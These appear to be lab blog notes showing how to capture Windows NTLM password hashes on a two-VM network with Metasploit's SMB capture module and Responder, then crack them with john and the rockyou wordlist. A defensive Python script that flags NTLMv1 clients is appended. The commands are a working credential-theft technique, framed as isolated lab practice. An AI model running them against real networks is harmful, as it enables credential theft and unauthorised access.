create 2 vms in virtualbox
1.) kali linux ATTACKER
will be used to run ettercap and perform man-in-the-middle
2.) windows VICTIM
will be the victim trying to access the web server
steps
-------
1.) set the virtualbox Network tab of both vms to "Internal Network" and give both the same network name
2.) power up both
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux ATTACKER with an ip address in the same subnet as windows
ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) ping each other from within each virtual machine to ensure connectivity
6.) on kali linux ATTACKER system start the metasploit smb capture module
> msfconsole
msf> use auxiliary/server/capture/smb
msf> set CAINPWFILE /tmp/cain.pw1
msf> set JOHNPWFILE /tmp/john.txt
msf> exploit
7.) on windows VICTIM system open windows explorer and try to connect to the attacker box
\\169.254.18.2\
windows will pop up an authentication prompt, enter a user & password (e.g. guy, password)
8.) on kali linux ATTACKER system metasploit should inform you it captured a hash and saved it under the /tmp/john.txt prefix (the file used below is /tmp/john.txt_netntlmv2)
type exit to exit metasploit
run john against the newly captured file
> john /tmp/john.txt_netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
if it's a weak password (like 'password') john should crack it quickly and display it to you on the screen
Friday, December 27, 2019
metasploit smb capture password hashes
Tuesday, October 22, 2019
Sample Responder command
responder -I eth0 -r -b
cd /usr/share/responder/logs
john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt
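For writing up the lab captures from both posts (the Metasploit john file and the Responder logs), this added example, which is not part of the original posts, sorts john-format lines into NetNTLMv1 and NetNTLMv2 by field layout and lists the accounts whose client still answered with NTLMv1. The function names and the sample lines are constructed for illustration.

```python
import re

HEX = re.compile(r"[0-9a-fA-F]+")

def _hex(s, n=None):
    """True if s is hex, and exactly n characters long when n is given."""
    return HEX.fullmatch(s) is not None and (n is None or len(s) == n)

def classify(line):
    """Return (protocol, user, domain) for a john-format capture line, else None."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        return None
    user, _, domain, f3, f4, f5 = parts
    # NetNTLMv1 layout: user::domain:LM response (24 bytes):NT response (24 bytes):challenge (8 bytes)
    if _hex(f3, 48) and _hex(f4, 48) and _hex(f5, 16):
        return ("NetNTLMv1", user, domain)
    # NetNTLMv2 layout: user::domain:challenge (8 bytes):NTProofStr (16 bytes):blob
    if _hex(f3, 16) and _hex(f4, 32) and _hex(f5):
        return ("NetNTLMv2", user, domain)
    return None

def audit(lines):
    """Map each domain\\user to the set of NTLM versions it answered with."""
    seen = {}
    for line in lines:
        hit = classify(line)
        if hit:
            proto, user, domain = hit
            seen.setdefault(f"{domain}\\{user}", set()).add(proto)
    return seen

def ntlmv1_accounts(lines):
    """Accounts whose client still sent NTLMv1, the weaker of the two responses."""
    return sorted(a for a, protos in audit(lines).items() if "NetNTLMv1" in protos)

# Constructed sample lines (filler hex, not real captures).
SAMPLE = [
    f"guy::LAB:{'00' * 24}:{'ab' * 24}:{'11' * 8}",
    f"guy::LAB:{'11' * 8}:{'cd' * 16}:{'01' * 40}",
    f"alice::LAB:{'22' * 8}:{'ef' * 16}:{'01' * 40}",
    "not a capture line",
]

if __name__ == "__main__":
    for account, protos in sorted(audit(SAMPLE).items()):
        print(account, sorted(protos))
    print("NTLMv1 seen for:", ntlmv1_accounts(SAMPLE))
```

Clients that show up in the NTLMv1 list are the ones to move to NTLMv2-only via the LmCompatibilityLevel policy.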